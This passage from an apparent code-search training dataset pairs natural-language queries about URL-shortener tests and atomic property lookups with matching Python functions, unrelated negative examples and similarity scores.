"def gen_shorter_url(long_url):\n if long_url in URL_PAIR_STORE.long_url:\n return URL_PAIR_STORE.short_url[\n URL_PAIR_STORE.long_url == long_url]\n else:\n short_url = DOMAIN_NAME + '/' + do_hashing(long_url)\n new_entry = URLPair(\n id=gen_unique_id(),\n long_url=long_url,\n short_url=short_url,\n )\n insert_new_pairs(new_entry)\n return short_url",
"def create_short_url():\n if request.method == 'POST':\n if 'url' in request.args:\n og_url = request.args['url']\n\n if url_check(og_url) is True:\n if 'custom' in request.args:\n token_string = request.args['custom']\n if 'tag' in request.args:\n tag_url = request.args['tag']\n else:\n tag_url = ''\n else:\n token_string = random_token()\n\n if 'tag' in request.args:\n tag_url = request.args['tag']\n else:\n tag_url = ''\n\n conn = psycopg2.connect(host=host, user=user, password=passwrd, database=db)\n cursor = conn.cursor()\n check_row = \"SELECT S_URL FROM WEB_URL WHERE S_URL = %s FOR UPDATE\"\n cursor.execute(check_row, (token_string,))\n check_fetch = cursor.fetchone()\n\n if check_fetch is None:\n insert_row = \"\"\"\n\t\t\t\t\t\tINSERT INTO WEB_URL(URL , S_URL , TAG) VALUES( %s, %s , %s)\n\t\t\t\t\t\t\"\"\"\n\n cursor.execute(insert_row, (og_url, token_string, tag_url,))\n\n conn.commit()\n conn.close()\n\n short_url = shorty_host + token_string\n long_url = og_url\n data = jsonify({\n 'long_url': og_url,\n 'short_url': short_url,\n 'custom': token_string,\n 'tag': tag_url\n })\n\n return make_response(data, 200)\n else:\n data = jsonify({'error': 'suffix already present'})\n return make_response(data, 200)\n else:\n data = jsonify({'error': 'URL given is not valid . Enter a valid URL.'})\n return make_response(data, 200)\n else:\n data = jsonify({'error': 'invalid request'})\n return make_response(data, 405)\n else:\n data = jsonify({'error': 'Invalid Method Used'})\n return make_response(data, 405)"
] |
[
"0.66355175",
"0.66069746",
"0.65604275",
"0.6440158",
"0.64186394",
"0.6341924",
"0.62792903",
"0.62442976",
"0.6228952",
"0.61976457",
"0.6176387",
"0.6163858",
"0.6097762",
"0.6049345",
"0.6034544",
"0.5974167",
"0.5925666",
"0.5920434",
"0.59131527",
"0.58411014",
"0.580802",
"0.5804937",
"0.5792929",
"0.57784384",
"0.5775389",
"0.5757774",
"0.57486904",
"0.57214457",
"0.57104546",
"0.5677904"
] |
0.75209296
|
0
|
Tests forwarding of a Short URL
|
def test_forward(self):
short_url = ShortURL.objects.create(url='http://example.com')
response = self.client.get('/%s'%(short_url.key))
self.assertEqual(response.status_code, 301)
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def url_shortner(self):",
"def test_short_url(self):\n tweet_object = self.load_tweet('basic')\n tweet_text = self.api.html_for_tweet(tweet_object, False)\n # Make sure HTML doesn't contain the display OR expanded url\n self.assertTrue('http://google.com' not in tweet_text)\n self.assertTrue('google.com' not in tweet_text)",
"def test_missing_shortlink(self):\n rv = self.app.get('/TheStakeOut')\n assert 'No url found' in rv.data",
"def test_redirects_shortlink_without_http_scheme(self):\n rv = self.post('www.seinfeld.com')\n assert '<a href=\"TheStakeOut\">TheStakeOut</a> is now short for <a href=\"www.seinfeld.com\">www.seinfeld.com</a>!' in rv.data\n rv = self.app.get('/TheStakeOut')\n assert rv.status_code == 302\n assert rv.location == 'http://www.seinfeld.com'",
"def test_redirects_shortlink(self):\n rv = self.post('https://www.seinfeld.com')\n assert '<a href=\"TheStakeOut\">TheStakeOut</a> is now short for <a href=\"https://www.seinfeld.com\">https://www.seinfeld.com</a>!' in rv.data\n rv = self.app.get('/TheStakeOut')\n assert rv.status_code == 302\n assert rv.location == 'https://www.seinfeld.com'",
"def testLongURL(self):\n self.assertEqual([], grab('www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www.www', self.needScheme))",
"def test_create_short_url_without_device(self):\n client = RequestsClient()\n response = client.post('http://testserver/api/v1/urls', json={'target': 'http://example.com'})\n assert response.status_code == 201\n\n short_url = dict(response.json())\n self.assertIsNone(short_url.get('mobile_url'))\n self.assertIsInstance(short_url.get('target'), str)",
"def test_already_created_shortlink(self):\n rv = self.post('https://www.seinfeld.com')\n assert '<a href=\"TheStakeOut\">TheStakeOut</a> is now short for <a href=\"https://www.seinfeld.com\">https://www.seinfeld.com</a>!' in rv.data\n rv = self.post('https://www.seinfeld.com')\n assert '<a href=\"TheStakeOut\">TheStakeOut</a> is now short for <a href=\"https://www.seinfeld.com\">https://www.seinfeld.com</a>!' in rv.data",
"def test_already_shortened_success(self):\n # Shorten a URL\n self.client.post(\n reverse('url_shortener'),\n data=json.dumps({'url': 'https://www.techcrunch.com/a-slug-here-starting-from-a'}),\n content_type='application/json'\n )\n\n # Try to shorten the same URL again.\n response = self.client.post(\n reverse('url_shortener'),\n data=json.dumps({'url': 'https://www.techcrunch.com/a-slug-here-starting-from-a'}),\n content_type='application/json'\n )\n self.assertEqual(response.status_code, 200)\n content = json.loads(response.content)\n self.assertEqual(content.get('shortened_url'), '{}/{}'.format(SITE_URL, 'a_test'))",
"def go_to_short_url(short_url):\n try:\n original_url = storage.get(short_url)\n return redirect(original_url)\n except:\n abort(400)",
"def test_create_shortlink(self):\n rv = self.post('https://www.seinfeld.com')\n assert '<a href=\"TheStakeOut\">TheStakeOut</a> is now short for <a href=\"https://www.seinfeld.com\">https://www.seinfeld.com</a>!' in rv.data",
"def test_success(self):\n response = self.client.post(\n reverse('url_shortener'),\n data=json.dumps({'url': 'https://www.techcrunch.com/some-slug-here-starting-from-s'}),\n content_type='application/json'\n )\n self.assertEqual(response.status_code, 201)\n\n response = self.client.post(\n reverse('url_shortener'),\n data=json.dumps({\n 'url': 'https://www.techcrunch.com/some-other-slug-here-starting-again-from-s'\n }),\n content_type='application/json'\n )\n self.assertEqual(response.status_code, 201)\n\n response = self.client.post(\n reverse('url_shortener'),\n data=json.dumps({'url': 'https://www.techcrunch.com/some-third-long-slug'}),\n content_type='application/json'\n )\n self.assertEqual(response.status_code, 201)\n\n content = json.loads(response.content)\n self.assertEqual(content.get('shortened_url'), '{}/{}'.format(SITE_URL, 'oaf'))",
"def test_create_short_url_with_device(self):\n target = 'http://exmaple.com'\n mobile_target = 'http://mobile.exmaple.com'\n tablet_target = 'http://tablet.exmaple.com'\n desktop_target = 'http://desktop.exmaple.com'\n data = {\n 'target': target,\n 'mobile_url': {'target': mobile_target},\n 'tablet_url': {'target': tablet_target},\n 'desktop_url': {'target': desktop_target},\n }\n\n client = RequestsClient()\n response = client.post('http://testserver/api/v1/urls', json=data)\n\n assert response.status_code == 201\n\n short_url = dict(response.json())\n self.assertIsNotNone(short_url.get('mobile_url'))\n self.assertIsNotNone(short_url.get('tablet_url'))\n self.assertIsNotNone(short_url.get('desktop_url'))\n\n mobile_url = short_url.get('mobile_url')\n tablet_url = short_url.get('tablet_url')\n desktop_url = short_url.get('desktop_url')\n\n self.assertEqual(mobile_url.get('target'), mobile_target)\n self.assertEqual(tablet_url.get('target'), tablet_target)\n self.assertEqual(desktop_url.get('target'), desktop_target)",
"def test_twitter_shortlink(self):\n\n test = Unfurl(remote_lookups=True)\n test.add_to_queue(data_type='url', key=None, value='https://t.co/g6VWYYwY12')\n test.parse_queue()\n\n # test number of nodes\n self.assertEqual(len(test.nodes.keys()), 18)\n self.assertEqual(test.total_nodes, 18)\n\n self.assertEqual(test.nodes[4].value, '/g6VWYYwY12')\n self.assertEqual(test.nodes[11].value, 'github.com')\n self.assertEqual(test.nodes[16].label, '1: obsidianforensics')\n\n # is processing finished empty\n self.assertTrue(test.queue.empty())\n self.assertEqual(len(test.edges), 0)",
"def redirect(url):",
"def test_url():\r\n global provided_url\r\n global verbose_flag\r\n # extracting url\r\n provided_url = urlparse(provided_url).scheme+\"://\"+urlparse(provided_url).netloc\r\n print provided_url \r\n if verbose_flag: print \"\\t[.] Checking if connection can be established...\",# + provided_url\r\n try:\r\n response = urllib2.urlopen(provided_url)\r\n \r\n except HTTPError, e:\r\n if verbose_flag: print \"[!] Failed\"\r\n return 0\r\n except URLError, e:\r\n if verbose_flag: print \"[!] Failed\"\r\n return 0\r\n else:\r\n valid_target = 1\r\n if verbose_flag: print \"Success\"\r\n return 1",
"def link_redirect(request, shortened_url: str):\n try:\n url = Url.objects.get(short_url=shortened_url)\n long_url = url.long_url\n return HttpResponseRedirect(long_url)\n except Url.DoesNotExist or TypeError:\n return HttpResponseBadRequest(\"Wrong url\")",
"def test_can_be_redirected(self):\n\n url = 'http://www.example.com'\n\n r = LiveRedirect(url=url,duration=HALF_DAY)\n r.save()\n\n TEST_URLS = [\n '%s/%s' % (self.live_server_url,r.slug),\n '%s/%s/' % (self.live_server_url,r.slug),\n ]\n\n for url in TEST_URLS:\n\n self.browser.get(url)\n\n body = self.browser.find_element_by_tag_name('body')\n\n # Check that it is not a 404 or 500\n self.assertNotIn('404',body.text)\n self.assertNotIn('500',body.text)\n\n # Slug page should always state what the url is\n self.assertIn(r.url, body.text, 'Link url not displayed on slug page!')\n\n # Slug page should always have a link to the correct page!\n links = self.browser.find_elements_by_tag_name('a')\n\n ok = False\n for link in links:\n if link.get_attribute('href').rstrip('/') == r.url.rstrip('/'):\n ok = True\n break\n\n self.failIf(not ok,'No link to target!')",
"def test_forward(self):\n validate_forward()",
"def test_good_get_url(self):\n result = self._search('Love Story', just_results=True)\n get_url = result[0]['get_url']\n resp = self.app.get(get_url)\n self.assertEqual(resp.status_code, 200)\n self.assertIn('url', resp.data)\n self.assertIn('/d?', resp.data)",
"def test_follow(self):\n url = 'http://www.python.org/'\n link = Link.objects.create(slug='testslug', url=url)\n self.assertEqual(link.usage_count, 0)\n\n # try to open without logging in\n response = self.client.get(reverse('shortener:follow', kwargs={\n 'slug': link.slug}))\n self.assertRedirects(response, LOGIN_URL, 400)\n\n # follow the short url and get a redirect\n User.objects.create_user('testuser', email='[email protected]')\n self.client.login(username='testuser')\n response = self.client.get(reverse('shortener:follow', kwargs={\n 'slug': link.slug}))\n self.assertRedirects(response, url, 301, fetch_redirect_response=False)\n\n # re-fetch link so that we can make sure that usage_count incremented\n link = Link.objects.get(id=link.id)\n self.assertEqual(link.usage_count, 1)",
"def test_redirect_view(self):\n # TODO: Get test to work.\n client = Client()\n #response = client.get(reverse(testurl))\n #self.assertEqual(301, response.status_code)",
"def test_linkedin_shortlink(self):\n \n test = Unfurl(remote_lookups=True)\n test.add_to_queue(data_type='url', key=None, value='https://lnkd.in/fDJnJ64')\n test.parse_queue()\n\n # test number of nodes\n self.assertEqual(len(test.nodes.keys()), 18)\n self.assertEqual(test.total_nodes, 18)\n\n self.assertEqual(test.nodes[4].value, '/fDJnJ64')\n self.assertEqual(test.nodes[11].value, 'thisweekin4n6.com')\n self.assertEqual(test.nodes[18].key, 4)\n\n # is processing finished empty\n self.assertTrue(test.queue.empty())\n self.assertEqual(len(test.edges), 0)",
"def test_specific_url_query_sent_with_request(self):\n req = self.httpbin_2.get_my_headers(dry_run=True)\n def_url_query = self.httpbin_2.client[\"get_my_headers\"][\"url_query\"]\n self.assertIn(urlencode(def_url_query), req.prepared_request.url)",
"def short(self, url):\r\n\r\n self.clean_url(url)\r\n json = {\"originalURL\": url, \"domain\": self.domain}\r\n headers = {\"authorization\": self.api_key}\r\n response = self._post(self.api_url, json=json, headers=headers)\r\n if response.ok:\r\n data = response.json()\r\n if \"shortURL\" not in data:\r\n raise ShorteningErrorException(\r\n f\"API Returned wrong response: \" f\"{data}\"\r\n )\r\n return data[\"shortURL\"]\r\n raise ShorteningErrorException(response.content)",
"def test_redirect_status(self):\n # TODO: Get test to work.\n client = Client()\n #response = client.get(testurl)\n #self.assertEqual(301, response.status_code)",
"def redirect_to_url(request, short_url):\n try:\n url = Url.objects.get(short_url=short_url)\n except Url.DoesNotExist:\n raise Http404()\n else:\n return HttpResponseRedirect(url.url)",
"def test_update_short_url(self):\n old_target = 'http://old.com'\n new_target = 'http://new.com'\n\n old_short_url = ShortUrl.objects.create(target=old_target)\n\n client = RequestsClient()\n response = client.patch('http://testserver/api/v1/urls/%s' % old_short_url.hash, json={'target': new_target})\n assert response.status_code == 200\n\n short_url = dict(response.json())\n self.assertEqual(short_url.get('target'), new_target)",
"def redirect_view(request, short_url):\n try:\n if request.method == 'GET':\n shortener = ShortenedURL.objects.get(short_url=short_url)\n shortener.times_visited += 1\n shortener.save()\n return HttpResponseRedirect(shortener.long_url)\n except ShortenedURL.DoesNotExist:\n return HttpResponse(status=404)",
"def short_url(self, short_url):\n\n self._short_url = short_url"
] |
[
"0.70597917",
"0.700918",
"0.69712824",
"0.69603354",
"0.6934416",
"0.6462165",
"0.64400935",
"0.6436771",
"0.6412842",
"0.63884264",
"0.637923",
"0.63788974",
"0.632071",
"0.63126487",
"0.62797225",
"0.6258323",
"0.62535286",
"0.6141924",
"0.613619",
"0.61337805",
"0.610609",
"0.6069687",
"0.6018508",
"0.5966642",
"0.5961444",
"0.59570974",
"0.5938434",
"0.5930512",
"0.5918581",
"0.58945316"
] |
0.7791865
|
0
|
Get the absolute property value with propertyname for the given atom.
|
def GetAbsoluteAtomicProperty(element='C',propertyname='m'):
if propertyname == "m":
return periodicTable.GetAtomicWeight(element)
elif propertyname == "V":
r = periodicTable.GetRvdw(element)
V = 4/3*pi*r**3
return V
elif propertyname == "Z":
return periodicTable.GetAtomicNumber(element)
elif propertyname == "Rv":
return periodicTable.GetRvdw(element)
elif propertyname == "Rc":
return periodicTable.GetRb0(element)
elif propertyname == "Zv":
return periodicTable.GetDefaultValence(element)
else:
PropertyDic = AtomProperty[element]
return PropertyDic[propertyname]
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def GetRelativeAtomicProperty(element='C',propertyname='m'):\n \n CpropertyDic = float(GetAbsoluteAtomicProperty('C', propertyname))\n PropertyDic = float(GetAbsoluteAtomicProperty(element, propertyname))\n \n return PropertyDic/CpropertyDic",
"def get_property(self,name):\n return self.dp.get_property(name)",
"def find_atom_by_property(atoms: t.List[Atom], property_value: any, property_name: str = \"id\") -> Atom:\r\n\r\n if (all([hasattr(a, property_name) for a in atoms])):\r\n all_hits = list(filter(lambda a: a.id == property_value, atoms))\r\n if len(all_hits) == 0:\r\n raise ValueError('There is no atom with id: ' + str(id))\r\n elif len(all_hits) > 1:\r\n raise ValueError('There is more than one atom with id: ' + str(id))\r\n else:\r\n return all_hits[0]\r\n else:\r\n raise ValueError(\"atom does not have Property: \" + property_name + \" but: \" + str(vars(atoms[0])))",
"def getAtom(self, atomname):\n if self.hasAtom(atomname):\n return self.atoms[atomname]\n else:\n return None",
"def get_atom(self, name, alt_loc = None):\n if alt_loc:\n if self.alt_loc_dict.has_key(name):\n altloc = self.alt_loc_dict[name]\n if altloc.has_key(alt_loc):\n return altloc[alt_loc]\n return None\n else:\n if not self.atom_dict.has_key(name):\n return None\n return self.atom_dict[name]",
"def get_window_property(self, connection, window, atom):\n self.logger.debug(\"Getting property %s from window %s\", atom, window)\n cookie = connection.core.GetProperty(\n False,\n window,\n atom,\n GetPropertyType.Any,\n 0,\n 2 ** 32 - 1\n )\n reply = cookie.reply()\n return self.get_property_value(reply)",
"def value_of_css_property(self, name):\n return self.element.value_of_css_property(name)",
"def get_property(self, property):\n return self.shell([\"getprop\", property])",
"def getprop(self, prop_name):\n return self.shell(\"getprop %s\" % prop_name)",
"def getProperty(propname):",
"def getprop(self, prop_name):\n return self.shell('getprop %s' % prop_name).decode('utf-8').strip()",
"def get_equivalent_atom(self, atom):\n try:\n return self.atom_dict[atom.name]\n except KeyError:\n return None",
"def getProperty(unique_name):",
"def get_dynamic_property(vim, mobj, type, property_name):\n properties = get_dynamic_properties(vim, mobj, [property_name], type)\n property_value = None\n if property_name in properties:\n property_value = properties.get(property_name)\n return property_value",
"def get_equivalent_atom(self, atom):\n try:\n return self.chain_dict[atom.chain_id].fragment_dict[atom.fragment_id].atom_dict[atom.name]\n except KeyError:\n return None",
"def get_equivalent_atom(self, atom):\n try:\n return self.fragment_dict[atom.fragment_id].atom_dict[atom.name]\n except KeyError:\n return None",
"def get_property(self, name):\n if (not name in self.properties):\n raise KeyError(\"Key '\" + name + \"' not found\")\n return self.properties[name]",
"def get(self, prop):\r\n prop_parts = prop.split(\".\")\r\n val = None\r\n for part in prop_parts:\r\n if val is None:\r\n val = self.obj.get(part)\r\n else:\r\n val = val.get(part)\r\n return val",
"def get_property_value(prop, paths):\n\n data = parse_config(paths)\n return data.get(prop)",
"def get_property_value(self, property, db):\n try:\n for p in self.properties:\n if p.idProperty == int(property):\n return p.get_value()\n except:\n return None",
"def get_equivalent_atom(self, atom):\n try:\n return self.model_dict[atom.model_id].chain_dict[atom.chain_id].fragment_dict[atom.fragment_id].atom_dict[atom.name]\n except KeyError:\n return None",
"def get_prop(node, name):\n title = node.get(\"title\")\n props = title.split(\";\")\n for prop in props:\n (key, args) = prop.split(None, 1)\n args = args.strip('\"')\n if key == name:\n return args\n return None",
"def get_property(prop, project):\n result = re.search(\n r'{}\\s*=\\s*[\\'\"]([^\\'\"]*)[\\'\"]'.format(prop),\n open(project + \"/__init__.py\").read(),\n )\n return result.group(1)",
"def get_value (property):\n assert is_iterable_typed(property, basestring) or isinstance(property, basestring)\n return replace_grist (property, '')",
"def get_dynamic_property(vim, mobj, type, property_name):\r\n obj_content = \\\r\n get_object_properties(vim, None, mobj, type, [property_name])\r\n property_value = None\r\n if obj_content:\r\n dynamic_property = obj_content[0].propSet\r\n if dynamic_property:\r\n property_value = dynamic_property[0].val\r\n return property_value",
"def propget(self, name):\r\n res = self._svn('propget', name)\r\n return res[:-1] # strip trailing newline\r",
"def prop(self):\n return getattr(self, name)",
"def do_get_property(self, spec):\n attribute = self.find_attribute(spec.name)\n if attribute is not None and isinstance(attribute, property):\n return attribute.fget(self)\n else:\n raise ValueError(\"No such property\", spec.name)",
"def getprop(name):\n return _slp.getprop(name)",
"def get_owner(self, property_name):\n\n property_owner = self.db.read_value(property_name, \"owner\")\n return property_owner"
] |
[
"0.65785086",
"0.6322747",
"0.61566937",
"0.60482395",
"0.60195005",
"0.5999082",
"0.5951637",
"0.59448093",
"0.5930747",
"0.5896596",
"0.58638",
"0.585692",
"0.5847448",
"0.58387524",
"0.5810104",
"0.57515085",
"0.574562",
"0.5737195",
"0.5735811",
"0.5706954",
"0.5691982",
"0.56782854",
"0.56739104",
"0.5666777",
"0.56634206",
"0.5662688",
"0.5657446",
"0.56308323",
"0.55689484",
"0.5559896"
] |
0.71773916
|
0
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.